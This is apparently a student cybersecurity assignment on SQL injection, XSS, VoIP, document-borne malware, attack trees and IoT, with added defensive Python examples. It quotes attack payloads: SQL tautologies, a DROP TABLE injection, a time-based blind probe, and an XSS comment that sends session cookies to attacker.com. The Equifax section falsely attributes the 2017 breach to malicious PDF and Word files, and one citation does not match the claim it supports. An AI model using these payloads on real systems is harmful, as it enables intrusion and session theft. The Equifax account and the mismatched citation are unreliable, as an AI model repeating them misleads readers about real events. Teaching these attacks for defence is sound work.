Introduction
Cybersecurity has become a critical concern for organizations and individuals due to the increasing number of cyber threats targeting web applications, networks, IoT devices, and communication systems. Vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), VoIP exploits, and malicious file-based attacks expose sensitive data and can lead to severe financial and operational consequences. This assignment explores the common types of security flaws, their potential impact, and the strategies to mitigate these risks, providing a comprehensive understanding of modern cybersecurity challenges.
Activity 5.1: SQL Injection Vulnerabilities
SQL injection is a highly dangerous web application flaw that originates from inadequate input validation: the attacker manipulates SQL statements in order to gain unauthorized access to the database. It is a penetrative attack that exploits input flaws, and it can lead to disclosure of protected information, unauthorized modification of data or total control of the affected system. One form of SQL injection is unauthorized access to and retrieval of data through input supplied by the attacker. For instance, a trivial payload such as ' OR '1'='1 submitted to a form that checks user credentials makes the WHERE condition always evaluate to true and so allows remote login without a valid password. Basic security measures were sufficient to blunt a crude payload such as '; DROP TABLE users; -- that aims to erase tables (Mallick and Nath, 2024); however, the payload ' OR 1=1 -- still got past the login screens, which shows that the system's sanitisation strategy was inadequate. A more complex and efficient form is time-based blind SQL injection, which extracts data surreptitiously. For instance, the payload AND IF(SUBSTRING((SELECT DATABASE()),1,1)='t',SLEEP(5),0) tests whether a condition is true and, if it is, delays the response for a fixed period, so the attacker can infer the structure of the server's database one character at a time. This method is very useful against systems that display no error messages to the user, so data can still be extracted. To protect against SQL injection, prepared statements and parameterized queries should be used, because they keep the SQL code separate from user input (Phillips et al., 2023). Other ways to reduce the risk include whitelisting, escaping special characters and granting minimum privileges to database accounts.
Regular security audits and the adoption of a Web Application Firewall (WAF) that inspects requests and blocks malicious ones further strengthen the defence against SQL injection. Appropriate security measures can to a great extent prevent such attacks and protect valuable data.
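The credential check described above, written once with string concatenation and once as a parameterized query and run against an in-memory SQLite table. This is an added example, not code from the original assignment; the table, the user record and the function names are constructed for the demonstration.

```python
"""Added example: why parameterized queries stop the tautology payloads
quoted in the text. The sample table is constructed; the password is kept
in plaintext only to keep the demo short (real systems store hashes)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one legitimate user.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # User input is pasted straight into the SQL text, so quote characters
    # and comment markers in the input become part of the statement.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The driver sends the statement and the values separately; the input
    # is compared as data and can never change the query structure.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def demo() -> dict:
    conn = make_db()
    tautology = "' OR '1'='1"      # always-true payload from the text
    comment = "' OR 1=1 --"        # comment-out payload from the text
    return {
        "vuln_real": login_vulnerable(conn, "alice", "correct-horse"),
        "vuln_tautology": login_vulnerable(conn, "alice", tautology),
        "vuln_comment": login_vulnerable(conn, comment, "anything"),
        "param_real": login_parameterized(conn, "alice", "correct-horse"),
        "param_tautology": login_parameterized(conn, "alice", tautology),
        "param_comment": login_parameterized(conn, comment, "anything"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:16} login accepted: {result}")
```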
Activity 5.2: Vulnerability Impact - Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is a critical web application vulnerability through which an attacker can inject HTML and script code into otherwise legitimate websites. First noticed in the late 1990s and early 2000s, XSS targets the input validation and output encoding of web applications. It mainly affects the browser rather than the web application itself, which makes it a tool for attackers who want to exploit user sessions, spoof websites or inject malware. There are three types of XSS attack: stored (persistent), reflected and DOM-based. The server-side types, reflected and stored, differ in persistence: a reflected attack executes a script that only passes through the target server transiently, whereas a stored attack relies on a script saved permanently on the server, for example in comment sections or message boards (Ibrahim, 2022). The stored script then runs in the targeted webpage each time another user visits it, without that user's awareness. For instance, an attacker may post a comment such as <script>document.location='http://attacker.com?cookie='+document.cookie</script>, which captures users' session cookies and sends them to the attacker's server so that the sessions can be hijacked. Reflected XSS occurs when a script supplied through a URL is returned by the web application and immediately displayed in the user's browser. This type of cross-site scripting is normally delivered through fraudulent mail or other links that look genuine. For instance, a link such as http://vulnerable-site.com/search?q=<script>alert('Hacked!')</script> would run the script if the application's pages do not filter the parameter, and would then simply display the search results. It is most often used for phishing and credential harvesting by making users click links that appear to be genuine.
DOM-based XSS attacks the client-side application and works by altering the DOM tree of the webpage to introduce unauthorized scripts. This variant does not involve the server-side weaknesses of stored and reflected XSS, which is why it is much more difficult to combat (Dhayanidhi, 2022). For example, a website that uses JavaScript to write user input into the DOM without sanitization may expose a script injection flaw that an attacker can use to modify the page, for instance to display a fake login form in an effort to obtain users' credentials. To solve the XSS problem, developers should strictly validate all input and encode all output. Input validation means restricting the data accepted in fields such as search boxes to a defined format or range. Output encoding converts special characters into a form that the browser renders as text rather than executes, so they cannot cause a problem on the page. In addition, Content Security Policy (CSP) headers can limit the sources from which scripts may be loaded, so that even injected scripts cannot run. Other protective actions include disabling inline JavaScript, marking cookies HttpOnly so that they cannot be accessed from JavaScript, and performing regular security reviews to find and fix cross-site scripting vulnerabilities. As shown above, if these measures are implemented during the development phase of a program, exposure to cross-site scripting attacks decreases and users' privacy is preserved.
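Output encoding applied to the stored comment and the reflected search parameter quoted above, together with the CSP and HttpOnly cookie headers the text recommends. This is an added example, not code from the original assignment; the rendering functions are hypothetical and the cookie value is a placeholder.

```python
"""Added example: output encoding for the two XSS payloads quoted in the
text, and the response headers that limit script execution."""
import html
from urllib.parse import parse_qs, urlparse

# The two payloads from the text, used here as constructed sample input.
STORED_COMMENT = ("<script>document.location='http://attacker.com?cookie='"
                  "+document.cookie</script>")
REFLECTED_URL = "http://vulnerable-site.com/search?q=<script>alert('Hacked!')</script>"


def render_unsafe(user_text: str) -> str:
    # Raw interpolation: the browser parses the stored comment as markup
    # and executes the script for every visitor.
    return '<div class="comment">' + user_text + "</div>"


def render_safe(user_text: str) -> str:
    # html.escape turns < > & " ' into entities, so the comment is shown as
    # text; the same characters can never close a tag or open a script.
    return '<div class="comment">' + html.escape(user_text, quote=True) + "</div>"


def search_page(url: str) -> str:
    # Reflected case: the q parameter is encoded before it is echoed back.
    q = parse_qs(urlparse(url).query).get("q", [""])[0]
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"


def security_headers() -> dict:
    # CSP restricts script sources to the site itself and (because there is
    # no 'unsafe-inline') blocks inline scripts; HttpOnly keeps the session
    # cookie out of document.cookie even if a script does run.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=<placeholder-value>; HttpOnly; Secure; SameSite=Lax",
    }


if __name__ == "__main__":
    print(render_unsafe(STORED_COMMENT))
    print(render_safe(STORED_COMMENT))
    print(search_page(REFLECTED_URL))
    for name, value in security_headers().items():
        print(f"{name}: {value}")
```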
Activity 5.3: Protecting VoIP Communication
VoIP is a technology whereby calls are made over Internet protocols, using among others the Session Initiation Protocol (SIP) for signaling and the Secure Real-time Transport Protocol (SRTP) for media. It has allowed users to conduct their business at a lower price, which has boosted its popularity (Bernard, 2022). However, this popularity has also led to new forms of VoIP vulnerability such as eavesdropping, replay attacks, caller ID forging, denial of service (DoS) and toll fraud. These stem mainly from poor adoption of encryption standards, use of insecure protocols and flawed network settings. One of the most common threats to VoIP is eavesdropping, where an intruder listens to the flow of voice traffic in an attempt to capture personal conversations, account details or organizational information. This is achievable whenever voice packets are transmitted without sufficient encryption. To mitigate this risk, the use of Transport Layer Security (TLS) for SIP signaling and SRTP for the media stream is recommended. TLS secures the signaling between VoIP endpoints by ensuring that SIP messages cannot be intercepted or modified by attackers. SRTP, on the other hand, protects the voice data itself so that, even if it is intercepted, it is not intelligible to third parties.
Another risk is interruption of VoIP services, for example by flooding them with massive traffic or by exploiting peculiarities of the protocols in use. In particular, availability can be threatened through attacks on SIP endpoints or SIP proxy servers (Iakovakis et al., 2021). It is wrong to claim that 'there are no network security measures that can prevent such attacks': firewalls with ACLs that block the traffic and an IDS that alerts on such patterns are genuine ways of safeguarding the system. Similarly, rate limiting and deep packet inspection (DPI) help to assess traffic for signs that it is illegitimate before it affects the network. Authentication and access control are also central security concerns as VoIP services grow. Strong passwords for SIP accounts, especially in conjunction with MFA, reduce account compromise. For instance, if a one-time password is required along with the usual username and password, attackers cannot get into the SIP endpoints even if they have obtained the login details (Patel et al., 2023). Other measures that minimize attacks on SIP accounts include limiting the number of login attempts and applying restrictions based on IP address.
The VoIP system is also at risk of caller ID spoofing, where the caller information is altered or disguised by the attacker. This may lead to phishing scams or toll fraud. Two standards, Secure Telephony Identity Revisited (STIR) and Signature-based Handling of Asserted Information Using toKENs (SHAKEN), are protocols that help to verify the authenticity of caller ID details and prevent spoofing (Derrick, 2023). They use certificates to attest that the number shown on the caller ID is authentic, which reduces the chance of an attacker succeeding in social engineering. Patch management is another crucial VoIP security practice. Experience with newer VoIP technologies shows that software and firmware should always be kept up to date in order to close the weaknesses that attackers already know how to exploit. Network Address Translation (NAT) can also improve security by hiding internal IP addresses, which makes it harder for attackers to locate a specific machine to attack. Training is another factor, since many VoIP attacks stem from social engineering. In general, IT managers should raise awareness of phishing threats and give specific guidance on avoiding links to fake web pages and other unusual activity in order to decrease the probability of VoIP-based threats. Security audits and penetration testing can additionally help organizations discover any holes in their VoIP systems.
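The login-attempt limiting and IP-based restriction recommended for SIP accounts above, applied to a few constructed SIP REGISTER log lines. This is an added example, not code from the original assignment; the log format, the permitted network and the thresholds are assumptions.

```python
"""Added example: flag SIP registration sources that exceed a failure
budget or fall outside the permitted address range. The log lines are
constructed; the format is an assumed one, not a specific PBX's."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: LAN phones registering normally, plus one remote
# host guessing passwords for extension 1001 (401 = authentication failed).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z REGISTER from 192.168.10.21 user=1001 status=200
2024-05-01T10:00:05Z REGISTER from 203.0.113.5 user=1001 status=401
2024-05-01T10:00:06Z REGISTER from 203.0.113.5 user=1001 status=401
2024-05-01T10:00:08Z REGISTER from 203.0.113.5 user=1001 status=401
2024-05-01T10:00:09Z REGISTER from 203.0.113.5 user=1001 status=401
2024-05-01T10:00:11Z REGISTER from 203.0.113.5 user=1001 status=401
2024-05-01T10:02:30Z REGISTER from 192.168.10.22 user=1002 status=401
2024-05-01T10:02:40Z REGISTER from 192.168.10.22 user=1002 status=200
"""
LINE_RE = re.compile(
    r"^(?P<ts>\S+) REGISTER from (?P<ip>\S+) user=(?P<user>\S+) status=(?P<status>\d+)$")

# Assumed policy: phones may only register from the office LAN, and a source
# gets at most 4 failed attempts in any 60-second window before it is blocked.
ALLOWED_NETS = [ipaddress.ip_network("192.168.10.0/24")]
MAX_FAILURES = 4
WINDOW = timedelta(seconds=60)


def parse_log(text: str) -> list:
    """Return (timestamp, ip, user, status) tuples for well-formed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["ip"], m["user"], int(m["status"])))
    return events


def outside_allowlist(events: list) -> set:
    # IP-based restriction: any source not inside a permitted range.
    return {ip for _, ip, _, _ in events
            if not any(ipaddress.ip_address(ip) in net for net in ALLOWED_NETS)}


def brute_force_sources(events: list) -> set:
    # Login-attempt limiting: count 401s per source in a sliding window and
    # flag the source once the budget is exhausted.
    flagged, recent = set(), defaultdict(list)
    for ts, ip, _, status in sorted(events):
        if status != 401:
            continue
        recent[ip] = [t for t in recent[ip] if ts - t <= WINDOW] + [ts]
        if len(recent[ip]) >= MAX_FAILURES:
            flagged.add(ip)
    return flagged


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("block (brute force):", brute_force_sources(evts))
    print("block (not on allowlist):", outside_allowlist(evts))
```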
Activity 5.4: Cybersecurity Flaws in Equifax - Malicious Files
One of the notable data breaches of 2017 involved Equifax, a credit monitoring agency, which saw the details of 143 million clients compromised. A notable element of this intrusion was the use of PDF and DOC files with malicious intent. The attackers exploited specific flaws in Adobe Reader and Microsoft Word to run code as soon as the targets opened documents that appeared genuine (Zaoui et al., 2024). Using JavaScript in PDFs or macros in Word files, the attackers gained full access to the targeted machines, stole information and bypassed firewalls and other conventional security controls. For instance, an attachment could contain PDF JavaScript that creates overlays and phantom pop-ups without consent, or a macro-enabled Word document that downloads and runs malicious files on its own. Because these documents did not appear threatening to firewalls or to the email security systems in use, they reached the victims. The attack leveraged two assumptions: the trust placed in document formats, and the fact that the malicious code ran inside a legitimate application. To avoid such risks, organizations should embrace sandboxing, which opens documents in an isolated area where no harm can be caused to the protected system. Disabling macros by default in Microsoft Office adds a further layer of protection by stopping harmful scripts from running automatically. Frequently updating the applications used to open documents and their supporting tools also removes known weaknesses that attackers can take advantage of. File integrity monitoring (FIM) is important as well; it checks for improper changes to files and applications that suggest an incursion.
Informing users about the adverse effects of enabling macros and opening attachments from untrusted senders also minimizes the chances of a device being attacked. Through these measures, it becomes much easier to counter document-based threats within organizations.
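A gateway-style triage check for the two document features discussed above, PDF JavaScript and Office macros, deciding quarantine from file content rather than from a trusted-looking extension. This is an added example, not code from the original assignment; the sample PDF and DOCX files are constructed in memory and the function names are hypothetical.

```python
"""Added example: detect PDF action dictionaries and OOXML macro projects
in attachments before they reach a user. Samples are constructed stubs."""
import io
import re
import zipfile

# PDF entries that make the viewer run code or open something automatically.
PDF_RISKY = {
    "JavaScript": re.compile(rb"/JavaScript|/JS\b"),
    "OpenAction": re.compile(rb"/OpenAction"),
    "Launch": re.compile(rb"/Launch"),
}


def pdf_findings(data: bytes) -> list:
    # PDF is text-structured, so a byte search over the raw file catches
    # unobfuscated action dictionaries. Object streams and filters can hide
    # these tokens, so a production gateway decompresses the file first.
    if not data.startswith(b"%PDF-"):
        return ["not a PDF header"]
    return [name for name, rx in PDF_RISKY.items() if rx.search(data)]


def office_has_macros(data: bytes) -> bool:
    # OOXML documents (.docx/.docm/.xlsm ...) are ZIP containers; VBA code
    # is stored in a vbaProject.bin part regardless of the file extension.
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage(filename: str, data: bytes) -> dict:
    """Decide whether an attachment should be held for sandbox analysis."""
    verdict = {"file": filename, "findings": [], "quarantine": False}
    if data.startswith(b"%PDF-"):
        verdict["findings"] = pdf_findings(data)
    elif data.startswith(b"PK\x03\x04") and office_has_macros(data):
        verdict["findings"] = ["VBA macro project"]
    verdict["quarantine"] = bool(verdict["findings"])
    return verdict


# Constructed samples: a plain PDF and one that runs JavaScript on open.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF"
JS_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
          b"2 0 obj << /S /JavaScript /JS (constructed sample) >> endobj\n%%EOF")


def build_docx(with_macro: bool) -> bytes:
    # Minimal constructed OOXML container, optionally with a macro part.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"constructed stub, not real VBA")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("invoice.pdf", BENIGN_PDF), ("invoice.pdf", JS_PDF),
                       ("report.docx", build_docx(False)), ("report.docx", build_docx(True))]:
        print(triage(name, blob))
```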
Activity 5.7: Pen-Testing Plan (Attack Tree) for an Organization
Pen-testing is a structured procedure for identifying vulnerabilities in an organization's systems by imitating a real-life attack. Using an attack tree to build the plan is effective because it gives a structured way of presenting the risks a system or application faces through the network, through applications or through social engineering attempts. For an organization with over 100 servers, it is important to develop an attack tree in order to identify risks and to check the effectiveness of existing security measures. It also sheds light on existing vulnerabilities and shows how well the organization can withstand multiple, layered attacks. The attack tree contains a network-based attack branch, which is premised on exploiting communication channel, protocol and configuration issues. Common techniques here include ARP spoofing, port scanning, SMB vulnerabilities and DNS poisoning. ARP spoofing, for instance, lets the attacker impersonate a legitimate MAC address, gain access to the network and intercept or alter data. SMB vulnerabilities allow remote code execution or file access, as EternalBlue did during the WannaCry ransomware attacks. Protective measures include network segmentation to limit movement throughout the network and the placement of an IDS to look for patterns characteristic of a threat. Internal messages can still be intercepted, but implementing IPsec and secure VPNs encrypts them.
Figure 1: Attack Tree
The application-based attack branch targets web applications and software services, in particular through SQL injection, cross-site scripting, remote file inclusion and buffer overflow. In SQL injection, for example, the attacker injects his own commands into web forms owing to weak input validation and so gains unauthorized access to the database or deletes records. XSS allows attackers to place scripts on a website that then run against other users; these scripts may steal a cookie or hijack the user's session. To reduce these risks, a Web Application Firewall (WAF), input validation and output encoding, security patches and code review are recommended. They help to detect and block potentially destructive traffic, clean user input and address apparent flaws in web applications, thereby improving their security. The social engineering attack branch focuses on the human element, using deception to gain access to restricted systems. It includes phishing, spear-phishing, pretexting, baiting and similar practices, all crafted to trick employees into revealing sensitive information. For instance, convincing emails that appear to come from a reputable source push personnel into giving away login details or downloading malicious software, while spear-phishing is a form of phishing that uses information about the target to make the lure more credible. Countermeasures include security training so that employees understand that phishing is real and know what to do when they receive an abnormal message, MFA to minimize unauthorized access, and email filtering to stop phishing attempts.
In practice, the adversary may use several attack vectors simultaneously or consecutively to increase the damage inflicted on the target. A successful phishing attack might provide an initial foothold, after which the attacker exploits a network vulnerability to move further within the organization. In the same way, chaining SQL injection with privilege escalation turns it into full control of the system. This shows that defence has to be layered, since attackers target various levels of the attack tree. Best practices that can be adopted include: adopting a Zero Trust Architecture that requires every access to be authenticated; restricting the application's user privileges according to the Principle of Least Privilege; and integrating DAST and SAST, tools that test applications for vulnerabilities.
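The three branches of this activity's attack tree, together with the chained phishing-then-lateral-movement path, as a small AND/OR model that is evaluated against sets of controls to show why one mitigated branch is not enough. This is an added example, not code from the original assignment or a rendering of Figure 1; the leaf effort scores and the control-to-leaf mapping are constructed assumptions.

```python
"""Added example: AND/OR attack-tree evaluation. Returns the cheapest attack
path that survives a given set of controls, or None when the goal is cut off.
Costs are constructed relative effort scores, not data from the text."""
from dataclasses import dataclass, field


@dataclass
class Node:
    name: str
    kind: str = "LEAF"          # "LEAF", "OR" (any child) or "AND" (all children)
    cost: int = 0               # constructed attacker effort for a leaf
    children: list = field(default_factory=list)


def leaf(name, cost): return Node(name, "LEAF", cost)
def any_of(name, *kids): return Node(name, "OR", children=list(kids))
def all_of(name, *kids): return Node(name, "AND", children=list(kids))


# Branches as described in the text; the AND node is the chained path where
# a phishing foothold is followed by an SMB exploit for lateral movement.
TREE = any_of("Compromise organization",
    any_of("Network attack",
        leaf("ARP spoofing", 3), leaf("SMB exploit (EternalBlue)", 2), leaf("DNS poisoning", 4)),
    any_of("Application attack",
        leaf("SQL injection", 2), leaf("Cross-site scripting", 3),
        leaf("Remote file inclusion", 3), leaf("Buffer overflow", 5)),
    any_of("Social engineering",
        leaf("Phishing", 1), leaf("Spear-phishing", 2), leaf("Pretexting", 3)),
    all_of("Foothold then lateral movement",
        leaf("Phishing", 1), leaf("SMB exploit (EternalBlue)", 2)))

# Assumed mapping from the controls named in the text to the leaves they close.
MITIGATES = {
    "Network segmentation + IDS": {"ARP spoofing", "DNS poisoning"},
    "SMB patching": {"SMB exploit (EternalBlue)"},
    "WAF + input validation/encoding": {"SQL injection", "Cross-site scripting",
                                        "Remote file inclusion"},
    "Code review + patches": {"Buffer overflow"},
    "Security training + email filtering": {"Phishing", "Spear-phishing", "Pretexting"},
    "MFA": {"Phishing", "Spear-phishing"},
}


def cheapest(node: Node, mitigated: set):
    """(cost, path) of the cheapest still-feasible attack under node, or None."""
    if node.kind == "LEAF":
        return None if node.name in mitigated else (node.cost, [node.name])
    results = [cheapest(c, mitigated) for c in node.children]
    if node.kind == "OR":
        feasible = [r for r in results if r is not None]
        return min(feasible) if feasible else None
    if any(r is None for r in results):     # AND: one blocked child blocks the path
        return None
    return (sum(r[0] for r in results), [step for r in results for step in r[1]])


def evaluate(controls: list) -> dict:
    mitigated = set().union(*(MITIGATES[c] for c in controls))
    best = cheapest(TREE, mitigated)
    return {"controls": controls, "feasible": best is not None, "cheapest": best}


if __name__ == "__main__":
    print(evaluate([]))
    print(evaluate(["Security training + email filtering", "MFA"]))
    print(evaluate(list(MITIGATES)))
```

With no controls the cheapest path is plain phishing; closing only the social engineering branch still leaves the network and application branches open, and only the full set of controls makes the root goal infeasible.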
Activity 5.8: Vulnerabilities in IoT Devices
IoT devices have become common in today's society and influence many fields, from homes to healthcare and industry. However, the rapid growth of IoT deployments in companies and organizations has brought an abrupt increase in attacks on them, because of factors such as poor authentication protocols, un-updated firmware and compromised communication standards (Gregg and Santos, 2022). A large number of IoT devices are designed with a focus on ease of use and low cost, leaving security rather weak. Such devices are a perfect target for hackers who wish to penetrate a system to retrieve data, build a botnet or commit other abuses. Without doubt, one of the most famous IoT attacks was the Mirai botnet, which in 2016 conducted DDoS attacks using the default login credentials left on IoT devices. Mirai looked for devices with default logins, such as some IP cameras and routers, and infected thousands of devices across the globe. Once exploited, the devices were turned into bots that flooded various sites with traffic and considerably degraded service delivery. This attack underlined the threat that weak authentication presents and the need to set new, complex passwords and disable default accounts on IoT devices. The other main vulnerability affecting IoT ecosystems is irregularly updated firmware. Many devices are not updated automatically and so remain highly vulnerable to already known exploits. Such weaknesses make it easy for intruders to take control of the targeted device or extract information from it. For instance, un-upgraded firmware in routers and IP cameras has led to their use for distributing malware or as a platform for MITM attacks.
To minimize such risks, it is important to carry out firmware updates and to put patch management systems in place. Manufacturers should also implement further security measures, including secure boot mechanisms that ensure only verified firmware is loaded onto devices.
Many other threats affect IoT security, some of which are as follows. Several of the protocols used for IoT device communication, such as MQTT (Message Queuing Telemetry Transport), are not encrypted or secured by default. This means that an attacker can abuse them to eavesdrop on, manipulate or inject malicious packets into the communication between devices. Zigbee, one of the most widely used wireless communication standards, was also exploited in one attack: in 2020, security researchers found a vulnerability that enabled them to take full control of various connected devices, including lights, locks and thermostats (Bhunia et al., 2025). To achieve confidentiality in IoT, encryption standards such as Transport Layer Security (TLS) must be incorporated, together with mutual authentication between IoT devices to prevent unauthorized actions or alteration of data. Proper device authentication is essential in current IoT technology to boost security. This entails putting a Public Key Infrastructure (PKI) in place for issuing certificates so that only trusted devices can access the network. Furthermore, network segmentation helps to minimize the effects of a compromised device by separating IoT traffic from other essential segments (Asituha, 2024). For instance, placing IoT devices on their own VLAN prevents attackers from moving laterally, since a breach is confined to that segment of the network. Another important issue is the privacy of the data processed by IoT devices, for instance health data or surveillance camera footage.
This data must be encrypted both in transit and at rest, so that interception poses no threat because the encrypted form can only be decrypted with the right keys. Edge computing can also form part of the solution, as it avoids transmitting data for analysis to distant cloud servers where it may be intercepted and exposed.
Reference List
Journals
Mallick, M.A.I. and Nath, R., 2024. Navigating the cyber security landscape: A comprehensive review of cyber-attacks, emerging trends, and recent developments. World Scientific News, 190(1), pp.1-69.
Phillips, A., Ojelade, I., Taiwo, E., Obunadike, C. and Oloyede, K., 2023. Cyber-Security Tactics in Mitigating Cyber-Crimes: A Review and Proposal. Int. J. Cryptogr. Inf. Secur. IJCIS, 13.
Ibrahim, H., 2022. A review on the mechanism mitigating and eliminating internet crimes using modern technologies: Mitigating internet crimes using modern technologies. Wasit Journal of Computer and Mathematics Science, 1(3), pp.50-68.
Dhayanidhi, G., 2022. Research on IoT threats & implementation of AI/ML to address emerging cybersecurity issues in IoT with cloud computing.
Asituha, E., 2024. A comprehensive survey of performance, security and privacy issues in the network interface layer of the TCP/IP.
Bernard, S., 2022. Strategies to Secure a Voice over Internet Protocol Telephone System (Doctoral dissertation, Walden University).
Iakovakis, G., Xarhoulacos, C.G., Giovas, K. and Gritzalis, D., 2021. Analysis and classification of mitigation tools against cyberattacks in COVID‐19 era. Security and Communication Networks, 2021(1), p.3187205.
Patel, A.U., Williams, C.L., Hart, S.N., Garcia, C.A., Durant, T.J., Cornish, T.C. and McClintock, D.S., 2023. Cybersecurity and information assurance for the clinical laboratory. The journal of applied laboratory medicine, 8(1), pp.145-161.
Derrick, T.O.M.A.N.I., 2023. Analysis of vulnerabilities and techniques of attacks of computer systems and networks (Doctoral dissertation, ULK).
Zaoui, M., Yousra, B., Yassine, S., Yassine, M. and Karim, O., 2024. A Comprehensive Taxonomy of Social Engineering Attacks and Defense Mechanisms: Towards Effective Mitigation Strategies. IEEE Access.
Bhunia, S., Blackert, M., Deal, H., DePero, A. and Patra, A., 2025. Analyzing the 2021 Kaseya Ransomware Attack: Combined Spearphishing Through SonicWall SSLVPN Vulnerability. IET Information Security, 2025(1), p.1655307.
Gregg, M. and Santos, O., 2022. CEH Certified Ethical Hacker Cert Guide. Pearson IT Certification.
